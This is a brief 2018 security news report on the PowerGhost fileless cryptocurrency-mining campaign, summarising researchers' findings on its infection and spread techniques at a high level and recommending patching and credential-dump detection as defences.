Delaware, USA – August 2, 2018 – Researchers from Kaspersky Lab discovered a new PowerGhost cryptocurrency miner, which attacks networks of organizations worldwide. Attackers use several fileless infection techniques to prevent detection by antivirus solutions. The initial system is infected remotely either by remote administration tools or by using exploits. Researchers from Sonicwall Capture Labs who also explored this malware assume that users could be lured to an infected webpage that executes an obfuscated PowerShell script to download and run the second stage script. The task of this script is to disable Windows Defender, collect information about the system and execute the necessary modules without saving them to the hard drive. To mine cryptocurrency, Attackers use the infamous XMRig or BitMiner. Then PowerGhost uses Mimikatz tool to dump credentials on the infected system and use them to propagate across the corporate network. Malware also uses EternalBlue exploit for lateral movement. It’s also worth noting that malware has several additional features: it can load and run additional payloads and conduct DDoS attacks.
The campaign started in the second half of July and continued to this day. As in the case of WannaMine, PowerGhost can completely paralyze operations of the entire company, remaining undetected by security solutions. It is necessary to install Windows security updates on vulnerable systems to protect against the spreading of malware using EternalBlue exploit. Detection of credentials dump is much more difficult so you can use Mimikatz Defence Framework for your SIEM to determine the beginning of the attack and take action timely.